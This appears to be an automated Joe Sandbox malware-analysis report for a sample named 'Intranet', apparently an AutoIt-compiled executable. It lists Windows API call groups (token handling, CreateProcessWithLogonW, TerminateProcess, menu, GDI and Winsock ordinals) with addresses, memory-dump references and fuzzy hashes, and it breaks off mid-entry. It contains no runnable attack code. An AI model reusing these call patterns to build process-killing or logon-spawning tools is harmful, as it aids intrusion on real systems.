                                                                              • Part of subcall function 004F8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004F8D14
                                                                            • GetLengthSid.ADVAPI32(?,00000000,004F904D), ref: 004F9482
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004F948E
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004F9495
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 004F94AE
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,004F904D), ref: 004F94C2
                                                                            • HeapFree.KERNEL32(00000000), ref: 004F94C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 3008561057-0
                                                                            • Opcode ID: a46188ecbe4c6c1e52d8ef1d7d7a022b598a5de53950834b1ce4c7135cc6d7df
                                                                            • Instruction ID: 414119e4ad49b0e847a357524ab960f21804795bb0ebaa35b74f48453dfc1440
                                                                            • Opcode Fuzzy Hash: a46188ecbe4c6c1e52d8ef1d7d7a022b598a5de53950834b1ce4c7135cc6d7df
                                                                            • Instruction Fuzzy Hash: 7911DC32504208EFDB108FA4CC19BBF7BA9FB61316F10801AEA81D7350C73A9D06EB64
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004F9200
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004F9207
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004F9216
                                                                            • CloseHandle.KERNEL32(00000004), ref: 004F9221
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004F9250
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 004F9264
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: c98a59351742b6ade762b4488cb55fee5089980f5f945f464e62af791e7353b7
                                                                            • Instruction ID: a08fa76247532a7bdf2608991f695dab4249746f8c47c03271c3523d8e590b58
                                                                            • Opcode Fuzzy Hash: c98a59351742b6ade762b4488cb55fee5089980f5f945f464e62af791e7353b7
                                                                            • Instruction Fuzzy Hash: AB116D7250120EBBDF018F94DD49FEE7BA9EF08304F044065FE04A22A0C3759D65EB60
                                                                            APIs
                                                                            • GetDC.USER32(00000000,?,?,?,80004003), ref: 004FC34E
                                                                            • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 004FC35F
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 004FC366
                                                                            • ReleaseDC.USER32(00000000,00000000,?,?,80004003), ref: 004FC36E
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004FC385
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 004FC397
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: c5d2e6f76250f62c2e9b3d0a2c559d505d413992cd5a855999313af7a898d661
                                                                            • Instruction ID: b10833ed6e6feb8650bb8cd549f683905afa90aa2c35a4c0a35c295b2e573333
                                                                            • Opcode Fuzzy Hash: c5d2e6f76250f62c2e9b3d0a2c559d505d413992cd5a855999313af7a898d661
                                                                            • Instruction Fuzzy Hash: B5014475E00318BBEF109BA69D49A5EBFB8EB58751F004066FE04A7380D6749D14DFA1
                                                                            APIs
                                                                              • Part of subcall function 004A16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A1729
                                                                              • Part of subcall function 004A16CF: SelectObject.GDI32(?,00000000), ref: 004A1738
                                                                              • Part of subcall function 004A16CF: BeginPath.GDI32(?), ref: 004A174F
                                                                              • Part of subcall function 004A16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 004A1778
                                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000,00000000,00000000,000000FF,00000000,00000001,?,?,?,0052C498,00000000), ref: 0052C57C
                                                                            • LineTo.GDI32(00000000,00000003,?,?,0052C498,00000000), ref: 0052C590
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000,?,0052C498,00000000), ref: 0052C59E
                                                                            • LineTo.GDI32(00000000,00000000,?,?,0052C498,00000000), ref: 0052C5AE
                                                                            • EndPath.GDI32(00000000,00000000), ref: 0052C5BE
                                                                            • StrokePath.GDI32(00000000,00000000), ref: 0052C5CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
                                                                            • Opcode ID: 89625dcef781aefadfe9cedc72ff1b3527f920cd5b8e1a0d509a6b42c17ee890
                                                                            • Instruction ID: 68719196a00a8c7b653ec6d0316e216b5053e654df072a209fa7835c86f4cded
                                                                            • Opcode Fuzzy Hash: 89625dcef781aefadfe9cedc72ff1b3527f920cd5b8e1a0d509a6b42c17ee890
                                                                            • Instruction Fuzzy Hash: D4110C7600020CBFDF029F94DC88E9A7FADEF18354F048011F9185A2A1C771AE59EBA0
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000,?,?,?,004AAB12), ref: 004C07EC
                                                                            • MapVirtualKeyW.USER32(00000010,00000000,?,?,?,004AAB12), ref: 004C07F4
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000,?,?,?,004AAB12), ref: 004C07FF
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000,?,?,?,004AAB12), ref: 004C080A
                                                                            • MapVirtualKeyW.USER32(00000011,00000000,?,?,?,004AAB12), ref: 004C0812
                                                                            • MapVirtualKeyW.USER32(00000012,00000000,?,?,?,004AAB12), ref: 004C081A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: 18593858879e9dd99b7aea5bbe77dd4d5d9b02bdb29a8e5b4433123843b8be47
                                                                            • Instruction ID: 4e870070674b676ab5becca35bb3c213f989b810c31c27b70002f4fcb8a362fb
                                                                            • Opcode Fuzzy Hash: 18593858879e9dd99b7aea5bbe77dd4d5d9b02bdb29a8e5b4433123843b8be47
                                                                            • Instruction Fuzzy Hash: 0D016CB09017597DE3008F5A8C85B52FFE8FF59354F00411BA15C47A41C7F5A868CBE5
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005059B4
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059CA
                                                                            • GetWindowThreadProcessId.USER32(?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059D9
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059E8
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059F2
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005059F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 3a0dfeaeda17cf80f7f1424f5819423a96b88b2b85e1834f2bf69c4397261e40
                                                                            • Instruction ID: 156e489cc6c80d4b7acb289a2cc4caff67d94a1775044f82d8eeae97ac261a4a
                                                                            • Opcode Fuzzy Hash: 3a0dfeaeda17cf80f7f1424f5819423a96b88b2b85e1834f2bf69c4397261e40
                                                                            • Instruction Fuzzy Hash: BEF03032241658BBE7215B929C0EEEF7F7CEFD6B11F000159FA05D1190E7A01A15E7B5
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 005077FE
                                                                            • EnterCriticalSection.KERNEL32(?,?,004AC2B6,?,?), ref: 0050780F
                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,004AC2B6,?,?), ref: 0050781C
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,004AC2B6,?,?), ref: 00507829
                                                                              • Part of subcall function 005071F0: CloseHandle.KERNEL32(00000000,?,00507836,?,004AC2B6,?,?), ref: 005071FA
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0050783C
                                                                            • LeaveCriticalSection.KERNEL32(?,?,004AC2B6,?,?), ref: 00507843
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 4cae8792440a82e35c7ed50f6458c1c0ac0f7ec707e5ecd52f894b4d7d981015
                                                                            • Instruction ID: 34169245217e1570a2e89c1a3b4b3aa01e044e329091141f0ea9b2316dd4b75a
                                                                            • Opcode Fuzzy Hash: 4cae8792440a82e35c7ed50f6458c1c0ac0f7ec707e5ecd52f894b4d7d981015
                                                                            • Instruction Fuzzy Hash: 96F0E236444306ABD3112B64EC8CAEF3B39FF58302F142421F503911E1CBB5A809EB60
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004F9555
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 004F9561
                                                                            • CloseHandle.KERNEL32(?), ref: 004F956A
                                                                            • CloseHandle.KERNEL32(?), ref: 004F9572
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004F957B
                                                                            • HeapFree.KERNEL32(00000000), ref: 004F9582
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: a0749a9f9a80a512b2e1a7c3cebfbe3cda7f79abea5988654adf2d5c920a9fef
                                                                            • Instruction ID: f21a5e9ece8e18d67d6cd582c6441838975bea1dc70b87b443b15cee2538833f
                                                                            • Opcode Fuzzy Hash: a0749a9f9a80a512b2e1a7c3cebfbe3cda7f79abea5988654adf2d5c920a9fef
                                                                            • Instruction Fuzzy Hash: 32E0E536004205BBDB011FE2EC1C95ABF39FF69B22B105620F215816B0CB32A468EB90
                                                                            APIs
                                                                            • #8.OLEAUT32(?,00530980), ref: 00518CFD
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00518E0C
                                                                            • #9.WSOCK32(?,00000001,00000000,Incorrect Parameter format,00000000), ref: 00518F84
                                                                              • Part of subcall function 00507B1D: #8.OLEAUT32(00000000,?,?,?,?,?,00519DBE,?,?), ref: 00507B5D
                                                                              • Part of subcall function 00507B1D: #10.WSOCK32(00000000,?,?,00519DBE,?,?), ref: 00507B66
                                                                              • Part of subcall function 00507B1D: #9.WSOCK32(00000000,?,00519DBE,?,?), ref: 00507B72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 3964851224-1221869570
                                                                            • Opcode ID: 48b6a45b2a1127d7d9c65c74d5d0dab874c6f2857875a9d3b58217f66b2653b2
                                                                            • Instruction ID: 9556304065ff94562ff24e00b901fd9e9b95f80f6b4c5caba5fb9557958cebb3
                                                                            • Opcode Fuzzy Hash: 48b6a45b2a1127d7d9c65c74d5d0dab874c6f2857875a9d3b58217f66b2653b2
                                                                            • Instruction Fuzzy Hash: 8F917C746043019FC710DF25C4849AABBE5FFD9318F04896EF88A8B3A1DB34E949CB52
                                                                            APIs
                                                                              • Part of subcall function 004B436A: _wcscpy.LIBCMT ref: 004B438D
                                                                            • _memset.LIBCMT ref: 0050332E
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0050335D
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00503410
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0050343E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                            • String ID: 0
                                                                            • API String ID: 4152858687-4108050209
                                                                            • Opcode ID: 59a3ee9d4f1f49c6d830f5aa24a927224380bf2c74638c126869a2ec1abd385b
                                                                            • Instruction ID: 192fbd80230a6bf4e76713b09ee291afe9705125829c7193e77a4ff0ef1fe71c
                                                                            • Opcode Fuzzy Hash: 59a3ee9d4f1f49c6d830f5aa24a927224380bf2c74638c126869a2ec1abd385b
                                                                            • Instruction Fuzzy Hash: 6B51CE356083019BDB169F29C849A6FBFECBB45314F040A2EF895971E1DB74CE44C756
                                                                            APIs
                                                                              • Part of subcall function 004B4A8C: _fseek.LIBCMT ref: 004B4AA4
                                                                              • Part of subcall function 00509CF1: _wcscmp.LIBCMT ref: 00509DE1
                                                                              • Part of subcall function 00509CF1: _wcscmp.LIBCMT ref: 00509DF4
                                                                            • _free.LIBCMT ref: 00509C5F
                                                                            • _free.LIBCMT ref: 00509C66
                                                                            • _free.LIBCMT ref: 00509CD1
                                                                              • Part of subcall function 004C2F85: HeapFree.KERNEL32(00000000,00000000,?,004C9C54,00000000,004C8D5D,004C59C3), ref: 004C2F99
                                                                              • Part of subcall function 004C2F85: GetLastError.KERNEL32(00000000,?,004C9C54,00000000,004C8D5D,004C59C3), ref: 004C2FAB
                                                                            • _free.LIBCMT ref: 00509CD9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                                            • API String ID: 1552873950-2806939583
                                                                            • Opcode ID: 6e8fbc33bba4cf3e19a2c7f45cef07a51b85885fc28cb68a3db4095dab673db9
                                                                            • Instruction ID: 8f1758927fd21cfda847d5016c1335321c2f4b6c82594da9abe270198920c34b
                                                                            • Opcode Fuzzy Hash: 6e8fbc33bba4cf3e19a2c7f45cef07a51b85885fc28cb68a3db4095dab673db9
                                                                            • Instruction Fuzzy Hash: 51512BB1D04219ABDF249F65DC45AAEBBB9FF88304F00049EF649A3281DB755E808F59
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00518A0E,?,00000000), ref: 0052DF71
                                                                            • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00518A0E,?,00000000,00000000), ref: 0052DFA7
                                                                            • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0052DFB8
                                                                            • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00518A0E,?,00000000,00000000), ref: 0052E03A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 753597075-1075368562
                                                                            • Opcode ID: bb03212824d97d985b660130e8f879bd30489fc17ddaddd7f09f3dfe2a403d95
                                                                            • Instruction ID: bf6e8f86d14c268088fdaae66cc2ca83192826559102448f88326ab80fc629de
                                                                            • Opcode Fuzzy Hash: bb03212824d97d985b660130e8f879bd30489fc17ddaddd7f09f3dfe2a403d95
                                                                            • Instruction Fuzzy Hash: D841AF71600215DFCB14CF55E889AAABFA9FF46300F1480AAEC059F285D7F1DD45DBA0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00502F67
                                                                            • GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 00502F83
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00502FC9
                                                                            • DeleteMenu.USER32(?,?,00000000,?,00000000,00000000,00567890,?), ref: 00503012
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: fa2b6106f5cc1f4ba922ca0750de1ad596013bc7ed944375be85dd59fbdb270f
                                                                            • Instruction ID: 97748cd1b4db3d607f874dbe23438635c2f43141168875f3fef14a6a0dfd5cbd
                                                                            • Opcode Fuzzy Hash: fa2b6106f5cc1f4ba922ca0750de1ad596013bc7ed944375be85dd59fbdb270f
                                                                            • Instruction Fuzzy Hash: 5541BF712093429FD720DF25C899B5ABBE8BF84350F104A1EF565972D1D770EA05CB62
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0051DEAE
                                                                              • Part of subcall function 004B1462: _memmove.LIBCMT ref: 004B14B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
